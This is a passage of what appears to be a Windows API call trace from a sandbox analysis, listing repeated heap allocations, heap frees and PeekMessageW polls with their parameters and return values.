wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0135.059] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0135.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0135.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0135.059] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0135.059] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0135.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0135.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0135.060] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0135.060] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0135.060] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0135.061] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0135.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0135.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0135.061] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0135.061] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0135.061] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0135.062] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0135.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0135.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0135.062] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0135.062] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0135.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0135.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0135.062] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0135.062] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e300 [0135.063] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e300 | out: hHeap=0x12c0000) returned 1 [0135.063] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0135.063] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0135.063] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0135.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0135.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0135.064] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0135.064] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0135.064] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0135.064] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0135.065] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0135.065] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0135.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0135.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0135.065] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0135.066] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0135.066] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0135.066] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.067] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0135.067] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.067] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0135.067] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.067] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.067] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.067] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0135.067] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.067] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0135.067] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.067] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0135.068] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0135.068] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0135.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0135.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0135.068] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7d8 [0135.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0135.069] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0135.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0135.069] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff690 [0135.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd910 [0135.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7d8 [0135.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd850 [0135.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0135.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b5fa8 [0135.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0135.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd910 | out: hHeap=0x12c0000) returned 1 [0135.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff690 | out: hHeap=0x12c0000) returned 1 [0135.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0135.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b5fa8 | out: hHeap=0x12c0000) returned 1 [0135.070] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0135.070] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0135.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0135.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: 